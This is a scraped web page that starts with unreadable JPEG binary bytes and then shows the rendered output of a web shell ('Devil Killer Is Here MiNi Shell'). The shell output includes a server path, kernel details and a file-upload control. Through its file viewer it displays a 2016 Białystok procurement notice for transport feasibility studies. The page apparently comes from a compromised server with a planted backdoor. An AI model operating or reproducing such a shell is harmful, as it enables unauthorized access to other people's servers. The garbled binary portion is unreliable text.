JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20160720/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20160720/145715-N-2016.html

<p class="kh_header"><b>Białystok: Wykonanie studiów wykonalności projektów: Część I: Intermodalny węzeł komunikacyjny w Białymstoku (centrum przesiadkowe wraz z korytarzami publicznego transportu zbiorowego), Część II: Poprawa dostępności centrum Białegostoku dla komunikacji miejskiej, Część III: Rozwój infrastruktury transportu miejskiego w Białymstoku</b><br>
<b>Numer ogłoszenia: 145715 - 2016; data zamieszczenia: 20.07.2016</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b>
<!--zamówienia publicznego.</p>-->
<table class="text2">
<tr><td style="border: solid 1px; width:15px black; text-align: center;"><b>V</b></td>
<td>zamówienia publicznego</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>zawarcia umowy ramowej</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>ustanowienia dynamicznego systemu zakupów (DSZ)</td></tr>
</table>


<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Miasto Białystok , ul. Słonimska 1, 15-950 Białystok, woj. podlaskie, tel. 085 869 60 02, faks 085 869 62 65.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.bialystok.pl</li><li><b>Adres strony internetowej, pod którym dostępne są informacje dotyczące dynamicznego systemu zakupów:</b> www.bialystok.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Wykonanie studiów wykonalności projektów: Część I: Intermodalny węzeł komunikacyjny w Białymstoku (centrum przesiadkowe wraz z korytarzami publicznego transportu zbiorowego), Część II: Poprawa dostępności centrum Białegostoku dla komunikacji miejskiej, Część III: Rozwój infrastruktury transportu miejskiego w Białymstoku.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1. Przedmiotem zamówienia jest wykonanie Studiów Wykonalności następujących projektów: Część I Intermodalny węzeł komunikacyjny w Białymstoku (centrum przesiadkowe wraz z korytarzami publicznego transportu zbiorowego), szacowana wartość projektu 155,00 mln PLN, w tym dofinansowanie ok. 125,49 mln PLN. Zakres rzeczowy projektu: 1) utworzenie centrum przesiadkowego w Białymstoku w okolicy dworców PKP i PKS, wraz z niezbędną infrastrukturą ITS; 2) budowę przebudowę układu drogowego wokół centrum zapewniającego sprawne funkcjonowanie komunikacji miejskiej, wraz z działaniami mającymi na celu uprzywilejowanie autobusów komunikacji miejskiej w ruchu, w tym: budowa tunelu dla autobusów, rowerów i pieszych pod torami PKP na przedłużeniu ul. Św. Rocha i ul. Zwycięstwa, przebudowa skrzyżowania ul. Zwycięstwa ul. Kolejowa, przebudowa skrzyżowania ul. Bohaterów Monte Cassino ul. kard. S. Wyszyńskiego, budowa skrzyżowania ul. Bohaterów Monte Cassino ul. Łomżyńska, przebudowa skrzyżowania ul. Bohaterów Monte Cassino ul. M. Kopernika, przebudowa skrzyżowania ul. Łomżyńska ul. M. Kopernika, przebudowa ul. Św. Rocha, przebudowa ul. Bohaterów Monte Cassino, budowa przedłużenia ul. Bohaterów Monte Cassino, przebudowa ul. Łomżyńskiej, budowa ul. Młynowej. 3) zakup 20 szt. niskoemisyjnego taboru. Stan przygotowania projektu do realizacji: Projekt podzielono na trzy zadania inwestycyjne: 1. budowa centrum przesiadkowego przy dworcach PKP i PKS wraz z budową tunelu pod torami PKP przebudową ul. św. Rocha i przebudowa skrzyżowania ul. Kolejowa ul. Zwycięstwa, 2. budowa i przebudowa układu komunikacyjnego wokół centrum przesiadkowego, 3. zakup niskoemisyjnego taboru. Dokumenty i decyzje: 1) koncepcja budowy zintegrowanego centrum komunikacyjnego wraz z terenami przyległymi: opracowana - 10.2015; 2) dokumentacja projektowa: zadanie 1 - II kw. 2018, zadanie 2 - zakładany termin opracowania - IV kw. 2017; 3) decyzja zrid pozwolenie na budowę: zadanie 1 - zakładany termin uzyskania - IV kw. 2018, zadanie 2 - zakładany termin uzyskania - II kw. 2018; 4) decyzja o środowiskowych uwarunkowaniach: zadanie 1 - zakładany termin uzyskania- IV kw. 2016, zadanie 2 - zakładany termin uzyskania - IV kw. 2016. Część II Poprawa dostępności centrum Białegostoku dla komunikacji miejskiej, szacowana wartość projektu 116,00 mln PLN, w tym dofinansowanie 92,34 mln PLN. Zakres rzeczowy projektu: 1) Rozwój korytarzy autobusu wysokiej jakości ułatwiające dostęp do centrum miasta dla komunikacji miejskiej: budowa ul. Sitarskiej (od ul. Kozłowej do ul. Świętokrzyskiej), przebudowa ul. Jurowieckiej (od ul. Ciepłej do ul. Poleskiej), przebudowa Al. 1000 -lecia Państwa Polskiego, 2) zakup 20 szt. niskoemisyjnego taboru, 3) kampania promocyjno - informacyjna dot. komunikacji miejskiej i rowerowej. Stan przygotowania projektu do realizacji: Projekt podzielono na pięć zadań inwestycyjnych: 1. budowa ul. Sitarskiej; 2. przebudowa Al. 1000 -lecia Państwa Polskiego; 3. przebudowa ul. Jurowieckiej; 4. kampania promocyjna; 5. zakup niskoemisyjnego taboru. Dokumenty i decyzje: 1) dokumentacja projektowa: zadanie 1 - opracowana II kw. 2014, zadanie 2 - zakładany termin opracowania - IV kw. 2016, zadanie 3 - zakładany termin opracowania - IV kw. 2016; 2) decyzja zrid pozwolenie na budowę: zadanie 1 - wydana w dniu 20.04.2015, zadanie 2 - zakładany termin wydania - I kw. 2017, zadanie 3 - zakładany termin wydania - I kw. 2017; 3) decyzja o środowiskowych uwarunkowaniach: zadanie 1 - wydana 29.09.2014 ostateczna 16.03.2016, zadanie 2 - wydana - 30.09.2011, zadanie 3 - zakładany termin wydania - nie dotyczy; 4) koncepcja kampanii promocyjnej - IV kw. 2016. Część III Rozwój infrastruktury transportu miejskiego w Białymstoku, szacowana wartość projektu 133, 00 mln PLN, w tym dofinansowanie 106,79 mln PLN. Zakres rzeczowy projektu: 1) Rozwój Korytarzy Autobusu Wysokiej Jakości w Białymstoku: przebudowa ul. Wiosennej wraz z budową pętli autobusowej, przebudowa ul. Legionowej (od ul. Cieszyńskiej do ul. M. Skłodowskiej - Curie), przebudowa ul. J.K. Branickiego wraz z budową pętli autobusowej w okolicy ul. Piastowskiej. 2) Rozbudowa systemu transportu publicznego w Białymstoku, na potrzeby gmin BOF, budowa infrastruktury drogowej i przystankowej mającej na celu uruchomienie nowych połączeń lub utrzymania dotychczasowych, pomiędzy Białymstokiem a osiedlami zlokalizowanymi na terenie gmin obszaru funkcjonalnego: budowa ul. Gminnej, przebudowa ul. A. Mickiewicza, budowa wlotu drogi z Hryniewicz do ul. K. Ciołkowskiego, przebudowa ul. K. Pułaskiego, przebudowa ul. Klepackiej wraz z budową tunelu, 3) budowa ulicy łączącej ul. Elewatorską z miejscowością Porosły w granicach miasta), 4) przebudowa ul. Produkcyjnej; 5) zakup 20 szt. niskoemisyjnego taboru; 6) infrastruktura na potrzeby pasażerów komunikacji miejskiej (wiaty przystankowe, system dynamicznej informacji pasażerskiej, biletomaty stacjonarne i w autobusach, system windykacji i kontroli, karta miejska, utworzenie P&R w okolicy ul. K. Ciołkowskiego ul. Wiosennej na ok 100-150 miejsc). Stan przygotowania projektu do realizacji: Projekt podzielono na siedemnaście zadań: 1. przebudowa ul. Legionowej (od ul. Cieszyńskiej do ul. M. Skłodowskiej - Curie); 2. przebudowa ul. Wiosennej wraz z budową pętli autobusowej; 3. przebudowa ul. J.K. Branickiego wraz z budową pętli autobusowej w okolicy ul. Piastowskiej; 4. przebudowa ul. Produkcyjnej; 5. budowa ulicy łączącej ul. Elewatorską z miejscowością Porosły (w granicach miasta); 6. przebudowa ul. A. Mickiewicza (w granicach miasta); 7. budowa wlotu drogi z Hryniewicz do ul. K. Ciołkowskiego; 8. przebudowa ul. K. Pułaskiego (w granicach miasta); 9. budowa ul. Gminnej (w granicach miasta); 10. przebudowa ul. Klepackiej wraz z budową tunelu; 11. budowa P&R w okolicy ul. K. Ciołkowskiego ul. Wiosennej na ok 100-150 miejsc; 12.	zakup niskoemisyjnego taboru; 13. infrastruktura na potrzeby pasażerów komunikacji miejskiej - wiaty przystankowe; 14. infrastruktura na potrzeby pasażerów komunikacji miejskiej - biletomaty stacjonarne i w autobusach; 15. infrastruktura na potrzeby pasażerów komunikacji miejskiej - rozbudowa systemu dynamicznej informacji pasażerskiej; 16. infrastruktura na potrzeby pasażerów komunikacji miejskiej - system kontroli i windykacji; 17. infrastruktura na potrzeby pasażerów komunikacji miejskiej - karta miejska. Dokumenty i decyzje: 1) dokumentacja projektowa: zadanie 1 - opracowana IV kw. 2016 zadanie 2 - opracowana II kw. 2015, zadanie 3 - planowane opracowanie IV. kw. 2016, zadanie 4 - planowane opracowanie I. kw. 2017, zadanie 5 - aktualizacja dokumentacji, planowane opracowanie I. kw. 2017, zadanie 6 - planowane opracowanie IV. kw. 2017, zadanie 7 - planowane opracowanie I. kw. 2017, zadanie 8 - w trakcie opracowania - planowane IV kw. 2016, zadanie 9 - planowane opracowanie IV. kw. 2017, zadanie 10 - planowane opracowanie IV. kw. 2016, zadanie 11 - planowane opracowanie I. kw. 2017, 2) decyzja zrid pozwolenie na budowę: zadanie 1 - planowane wydanie IV. kw. 2016, zadanie 2 - planowane wydanie IV. kw. 2016, zadanie 3 - planowane wydanie II. kw. 2017, zadanie 4 - planowane wydanie II. kw. 2017, zadanie 5 - wydana 21.05.2010, zadanie 6 - planowane wydanie I. kw. 2018, zadanie 7 - planowane wydanie II. kw. 2017, zadanie 8 - planowane wydanie I. kw. 2017, zadanie 9 - planowane wydanie II. kw. 2018, zadanie 10 - planowane wydanie II kw. 2018, zadanie 11 - planowane wydanie II. kw. 2017, 3)	decyzja o środowiskowych uwarunkowaniach: zadanie 1 - wydana - 19.12.2008, zadanie 2 - nie dotyczy, zadanie 3 - nie dotyczy, zadanie 4 - nie dotyczy, zadanie 5 - wydana - 04.18.2009, zadanie 6 - planowane wydanie IV kw. 2016, zadanie 7 - nie dotyczy, zadanie 8 - planowane wydanie IV. kw. 2016, zadanie 9 - planowane wydanie IV. kw. 2016, zadanie 10 - wydana - 26.02.2016, zadanie 11 - planowane wydanie IV kw. 2016. 2.	Zakres przedmiotu zamówienia obejmuje również przeprowadzenie, w odniesieniu do każdego projektu, wszystkich niezbędnych badań lub analiz (w tym np. badań ruchu) niezbędnych do opracowania przedmiotu zamówienia. 3. Przedmiotowe studia wykonalności stanowią załączniki do wniosków o dofinansowanie projektów planowanych do realizacji w ramach Programu Operacyjnego Polska Wschodnia 2014-2020, Oś priorytetowa II. Nowoczesna Infrastruktura Transportowa, działanie 2.1 Zrównoważony transport miejski. Projekty zostały zidentyfikowane w SZOOP Programu Polska Wschodnia - zał. nr 4 Wykaz projektów zidentyfikowanych przez właściwą instytucję w ramach trybu pozakonkursowego oraz są wskazane jako projekty komplementarne do planowanych do realizacji projektów w ramach Strategii Zintegrowanych Inwestycji Terytorialnych Białostockiego Obszaru Funkcjonalnego. Planowany termin składania wniosków: IV kw. 2016r. Zakres merytoryczny opracowania: 1) Studia Wykonalności muszą być zgodne z obowiązującym prawem polskim i unijnym oraz obowiązującymi wytycznymi i programami. Wszystkie obowiązujące dokumenty dostępne są za pośrednictwem strony internetowej: https: www.polskawschodnia.gov.pl strony o-programie dokumenty . 2) Studia wykonalności muszą uwzględniać wymogi dotyczące projektów z zakresu transportu miejskiego Zrównoważona intermodalna mobilność miejska PI 4e), Postanowienia Umowy Partnerstwa, Wspólna interpretacja oraz inne wytyczne KE dotyczące zrównoważonej mobilności miejskiej. 3) Studia wykonalności powinny zawierać aktualne badania ruchu na odcinkach dróg objętych inwestycją, w szczególności niezbędne do celów opracowania analizy ekonomicznej projektu. Badania należy wykonać w ciągu dwóch dni roboczych (wtorek, środa lub czwartek) jednego tygodnia, w miesiącach, w których średni dobowy ruch jest najbardziej zbliżony do średniego dobowego ruchu w roku. W każdym z dni pomiarowych pomiary należy prowadzić przez 16 godzin, w godzinach 6:00 - 22:00, w przekroju drogi, należy przeprowadzać w podziale na kategorie pojazdów (zakres minimalny): samochody osobowe; samochody dostawcze; samochody ciężarowe bez przyczep; samochody ciężarowe z przyczepami; autobusy. Pomiary należy wykonywać w punktach pomiarowych zlokalizowanych w ten sposób, aby mierzona wielkość ruchu była miarodajna dla całego odcinka drogi. Zamawiający dopuszcza również możliwość wykonania prognoz ruchu w oparciu o model ruchu dla Miasta Białystok w programie Visum (stan obecny). W przypadku wykorzystania prognoz w oparciu o model ruchu, w studium wykonalności Wykonawca zamieści opis oraz przekaże wersje elektroniczne prognoz. 4) Studia wykonalności muszą zawierać wszystkie informacje wynikające z wniosku o dofinansowanie oraz ujęte w kryteriach oceny projektów dla osi priorytetowej II Nowoczesna Infrastruktura Transportowa działania 2.1 Zrównoważony transport miejski Programu Operacyjnego Polska Wschodnia. W szczególności w ramach przygotowywanych studiów wykonalności projektów należy szeroko i wieloaspektowo opisać kwestie środowiskowe i dotyczące odporności i adaptacji do zamian klimatu. Aspekty te powinny zostać szczegółowo potraktowane w studium wykonalności, w tym w ramach analizy wariantów, analizy ekonomicznej, analizy wrażliwości i ryzyka. Na obecnym etapie wskazówkami co do zakresu i sposobu ujęcia wskazanych powyżej kwestii może być wzór formularza wniosku wraz z instrukcją (w zakresie punktów D,E,F) przygotowany w ramach Działania III.1 Infrastruktura kolejowa PO PW, dostępnym na stronie http: www.cupt.gov.pl ?id=1977. Wszechstronne i wnikliwe uwzględnienie szeroko rozumianych kwestii środowiskowych jest niezbędne ze względu na konieczność spełnienia przez projekt kryteriów oceny wniosku o dofinansowanie m.in. Projekt jest zgodny z ogólnymi zasadami ustanowionymi w art. 7 i 8 rozporządzenia Parlamentu Europejskiego i Rady (UE) nr 1303 2013, Zgodność projektu z polityką ochrony środowiska, Odporność na zmiany klimatu, Adaptacja do zmian klimatu. 5) Jednym z elementów, każdego ze studiów wykonalności musi być rozdział Analiza popytu. Analiza popytu ma identyfikować i ilościowo określać społeczne zapotrzebowanie na realizację planowanej inwestycji. W jej ramach należy uwzględnić zarówno bieżący (w oparciu o aktualne dane), jak również prognozowany popyt (w oparciu o prognozy przeprowadzone przez Wykonawcę, uwzględniające m.in. wskaźniki makroekonomiczne i społeczne). W celu prawidłowego wykonania analizy popytu należy opisać założenia oraz metodykę wykonania prognoz popytu. Do przeprowadzenia analizy popytu Zamawiający dopuszcza możliwość wykorzystania informacji uwzględnionych w Studium Transportowym Białostockiego Obszaru Funkcjonalnego (2014), Planie Zrównoważonego Rozwoju Publicznego Transportu Zbiorowego na lata 2015-2020, dla Miasta Białegostoku i gmin ościennych które zawarły z Miastem Białystok porozumienie w sprawie wspólnej organizacji transportu publicznego oraz pozostałych gmin wchodzących w skład obszaru funkcjonalnego (przyjęty Uchwałą Nr XVI 240 15 Rady Miasta Białystok z dnia 14.12.2015), dane udostępnione przez organizatora komunikacji w Białymstoku - Zarząd Białostockiej Komunikacji Miejskiej (ilość przewożonych pasażerów, planowane zmiany linii komunikacyjnych itp.) oraz posiadanego przez Zamawiającego modelu ruchu dla miasta Białystok w programie  Visum  (stan istniejący). Zamawiający będzie dysponował prognozami ruchu w programie  Visum  w latach 2020, 2025, 2030 na przełomie września października br. 6) Zadaniem Wykonawcy jest przygotowanie kompletnych Studiów Wykonalności, zgodnych z ww. wymogami. 7) Przedmiot zamówienia należy wykonać i dostarczyć do siedziby Zamawiającego, Urząd Miejski w Białymstoku, Biuro Funduszy Europejskich, ul. Słonimska 1 pok. 908 w ilości 4 egzemplarzy w wersji papierowej oraz w ilości 4 egzemplarzy w wersji elektronicznej (w formatach: .pdf, .doc lub .docx), łącznie z aktywnymi arkuszami kalkulacyjnymi i modelami, służącymi do dokonania obliczeń (w formacie .xls lub .xlsx), osobno dla każdej części. 8) Na każde wezwanie Zamawiającego, Wykonawca zobowiązany jest do udzielenia wyjaśnień dotyczących treści opracowanego Studium Wykonalności, w szczególności w trakcie oceny wniosku o dofinansowanie realizacji projektu, oraz do poprawy dokumentów zgodnie z uwagami zgłaszanymi przez Instytucję Pośredniczącą Zarządzającą w trakcie oceny wniosku o dofinansowanie projektu, którego studium wykonalności jest załącznikiem. 9) W przypadku opublikowania przez Instytucję Zarządzającą lub Instytucję Pośredniczącą zmian uzupełnień dokumentów niezbędnych do opracowania przedmiotu umowy, Wykonawca zobowiązany jest uwzględnić opublikowane zmiany i uzupełnić Studium Wykonalności zgodnie z obowiązującą wersją, jeżeli publikacja zmian nastąpi nie później niż 7 dni przed terminem złożenia pierwszej wersji Studium Wykonalności. Jeżeli zmiany lub uzupełnienia dokumentów niezbędnych do opracowania przedmiotu umowy zostaną opublikowane w terminie późniejszym, Wykonawca sporządzi wykaz zmian, które należy wprowadzić w Studium Wykonalności i dołączy go do końcowej wersji. 3. W ramach prawa opcji, w przypadku złożenia przez Zamawiającego wniosku o dofinansowanie w ramach Programu Operacyjnego Polska Wschodnia 2014-2020, Oś priorytetowa II. Nowoczesna Infrastruktura Transportowa, działanie 2.1 Zrównoważony transport miejski, Wykonawca zobowiązuje się do ustosunkowania się do uwag (w tym wprowadzenia zmian do studium wykonalności) zgłaszanych przez Instytucję Pośredniczącą Instytucję Zarządzającą na etapie oceny formalnej i merytorycznej wniosku o dofinansowanie w zakresie studium wykonalności i zaakceptowanie ich przez Instytucję Pośredniczącą Instytucję Zarządzającą..</p>
<p><b>II.1.5)
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>V</b></td>
<td><b>przewiduje się udzielenie zamówień uzupełniających:</b></td></tr>
</table>                            
</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li>
<li>ZAMAWIAJĄCY PRZEWIDUJE MOŻLIWOŚĆ UDZIELENIA ZAMÓWIEŃ UZUPEŁNIAJĄCYCH W WYSOKOŚCI DO 20% ZAMÓWIENIA PODSTAWOWEGO NA PODSTAWIE ART. 67 UST.1 PKT 6 USTAWY PZP</li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 71.24.10.00-9.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 3.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.12.2017.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> nie dotyczy</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>nie dotyczy</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>w celu potwierdzenia spełnienia warunku Wykonawca winien wykazać się realizacją zamówień w okresie ostatnich 3 lat przed upływem terminu składania ofert w niniejszym postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie: co najmniej 3 usługi polegające na wykonaniu studiów wykonalności dla inwestycji infrastrukturalnych z zakresu transportu miejskiego lub infrastruktury drogowej w miastach, o wartości inwestycji powyżej 20 mln zł każda; z podaniem ich wartości, przedmiotu, daty wykonania i podmiotu, na rzecz którego usługi zostały wykonane oraz załączeniem dowodów, czy zostały wykonane należycie</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>nie dotyczy</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>w celu potwierdzenia spełnienia warunku wykonawca winien wykazać się dysponowaniem osobami, które będą uczestniczyć w wykonywaniu zamówienia, w tym: min. 2 osoby, z których każda posiada doświadczenie w realizacji min. 3 usług wykonywania studiów wykonalności z zakresu transportu miejskiego poprzez uczestnictwo w zespole realizującym tego typu usługi; z podaniem informacji na temat ich doświadczenia niezbędnego do wykonywania zamówienia, a także zakresu wykonywanych przez nie czynności oraz informacją o podstawie do dysponowania tymi osobami</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>nie dotyczy</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

<li  style="margin-bottom: 12px;">określenie dostaw lub usług, których dotyczy obowiązek wskazania przez wykonawcę w wykazie lub złożenia poświadczeń, w tym informacja o dostawach lub usługach niewykonanych lub wykonanych nienależycie<br>za główne usługi, których dotyczy obowiązek wskazanie w wykazie i załączenia ww. dowodów, uznaje się usługi niezbędne do wykazania spełniania warunku określonego w sekcji III.3.2); Zamawiający nie wymaga złożenia do oferty wykazu wszystkich wykonanych usług oraz informacji o usługach niewykonanych lub wykonanych nienależycie;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
